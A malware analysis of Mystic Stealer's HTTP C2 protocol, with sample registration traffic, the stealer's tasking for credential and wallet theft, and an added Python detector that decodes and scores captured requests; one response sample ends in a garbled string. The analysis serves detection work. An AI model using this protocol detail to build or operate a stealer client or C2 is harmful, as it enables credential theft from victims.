In the latest Mystic Stealer variant, all communications between the infected system and the C2 server are performed using HTTP POST requests. Unlike the previous variant, which used RC4 to encrypt a custom binary TCP-based protocol, the latest variant does not implement any form of encryption. The data sent in the POST query is Base64 encoded, as shown below:

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="<name>"

BASE64(<data>)
--<boundary>
The response data from the server is also encoded in Base64. The decoded response starts with "OK\r\n" and is followed by any data returned by the C2 server for the specific query.
The infected system (bot) starts communication with the C2 server by sending a POST request with data containing a variable named hwid, which includes a Base64 encoded bot ID generated based on information from the victim's machine. A second variable with the name build contains the botnet ID, a value that is hardcoded in the binary of the malware. Once the C2 receives these initial two packets, the bot is registered.

The C2 server generates and returns a session token (a 64 byte lowercase hexadecimal string) that will be used in subsequent packets, together with a set of binary flags that indicates which actions should be performed (take a screenshot, steal browser credentials, steal cryptocurrency wallets, etc.).
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK <rest of data for the specific command, if necessary>)

Registration
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="hwid"

BASE64(0123456789ABCDEF123456)
--<boundary>
Content-Disposition: form-data; name="build"

BASE64(botnet_id)
--<boundary>--
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 07 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK <token>1kpfopkelmapcoipemfendmdcghnegimn
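The request and response formats described above (multipart POST to /loghub/master with Base64 fields, Base64 response with an "OK" prefix, and the hwid/build registration pair) are easy to match in captured traffic. The following Python is an added example for defenders, not code from the original post or from Zscaler: it parses a raw HTTP request, decodes the form fields, scores the request against the indicators the post lists, and extracts the session token from a registration response. The sample request and response, the boundary string, and the 64-character token are constructed for the example; only the path, User-Agent string, field names and the hwid/build sample values come from the post.

```python
import base64
import re

# Indicators taken from the traffic samples in the post.
C2_PATH = "/loghub/master"
C2_USER_AGENT = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
REGISTRATION_FIELDS = {"hwid", "build"}
# The post describes the session token as a 64-byte lowercase hex string.
TOKEN_RE = re.compile(r"^[0-9a-f]{64}$")


def parse_multipart_fields(raw_request: str) -> dict:
    """Return {field name: value} for every form-data part of a raw HTTP request.
    Each value is Base64-decoded, as the protocol requires; a part whose value
    is not valid Base64 is kept verbatim so the analyst still sees it."""
    head, _, body = raw_request.partition("\r\n\r\n")
    boundary_match = re.search(r'boundary=("?)([^";\r\n]+)\1', head)
    if not boundary_match:
        return {}
    boundary = boundary_match.group(2)
    fields = {}
    for part in body.split("--" + boundary):
        part = part.strip()
        if not part or part == "--":  # leading empty chunk / closing delimiter
            continue
        part_headers, _, value = part.partition("\r\n\r\n")
        name_match = re.search(r'name="([^"]+)"', part_headers)
        if not name_match:
            continue
        value = value.strip()
        try:
            decoded = base64.b64decode(value, validate=True).decode("utf-8", "replace")
        except ValueError:
            decoded = value
        fields[name_match.group(1)] = decoded
    return fields


def score_request(raw_request: str) -> dict:
    """Match one captured request against the indicators described in the post."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    first_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        key, _, val = line.partition(":")
        headers[key.strip().lower()] = val.strip()
    tokens = first_line.split()
    method, path = (tokens[0], tokens[1]) if len(tokens) >= 2 else ("", "")
    fields = parse_multipart_fields(raw_request)
    hits = {
        "method_post": method == "POST",
        "path": path == C2_PATH,
        "user_agent": headers.get("user-agent") == C2_USER_AGENT,
        "registration_fields": REGISTRATION_FIELDS <= set(fields),
    }
    return {"hits": hits, "score": sum(hits.values()), "fields": fields}


def parse_response(raw_response: str) -> dict:
    """Base64-decode a C2 response body and split the 'OK' prefix from the payload.
    If the payload is a 64-char lowercase hex string it is reported as the session token."""
    _, _, body = raw_response.partition("\r\n\r\n")
    try:
        decoded = base64.b64decode(body.strip(), validate=True).decode("utf-8", "replace")
    except ValueError:
        return {"ok": False, "payload": None, "token": None}
    if not decoded.startswith("OK"):
        return {"ok": False, "payload": decoded, "token": None}
    payload = decoded[2:].lstrip("\r\n ")
    return {"ok": True, "payload": payload,
            "token": payload if TOKEN_RE.match(payload) else None}


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed sample traffic in the shape the post documents.
SAMPLE_HWID = "0123456789ABCDEF123456"   # sample value from the post
SAMPLE_BUILD = "botnet_id"               # sample value from the post
SAMPLE_TOKEN = "ab" * 32                 # constructed 64-char lowercase hex token
_BOUNDARY = "----exampleboundary1234"    # constructed
_BODY = (
    f"--{_BOUNDARY}\r\nContent-Disposition: form-data; name=\"hwid\"\r\n\r\n{_b64(SAMPLE_HWID)}\r\n"
    f"--{_BOUNDARY}\r\nContent-Disposition: form-data; name=\"build\"\r\n\r\n{_b64(SAMPLE_BUILD)}\r\n"
    f"--{_BOUNDARY}--\r\n"
)
SAMPLE_REQUEST = (
    f"POST {C2_PATH} HTTP/1.1\r\n"
    f"Content-Type: multipart/form-data; boundary={_BOUNDARY}\r\n"
    f"Content-Length: {len(_BODY)}\r\n"
    f"User-Agent: {C2_USER_AGENT}\r\n"
    "Host: 192.0.2.10\r\n"                # constructed documentation address
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n" + _BODY
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n\r\n"
    + _b64("OK\r\n" + SAMPLE_TOKEN)
)

if __name__ == "__main__":
    print(score_request(SAMPLE_REQUEST))
    print(parse_response(SAMPLE_RESPONSE))
```

A score of 4 on a request means every indicator from the post matched; in practice the User-Agent string alone (MSIE 7.0 on Windows NT 5.1 with InfoPath.1) is a strong anomaly on any modern network and is worth an alert on its own, while the decoded hwid/build pair is what confirms a registration attempt rather than ordinary beaconing.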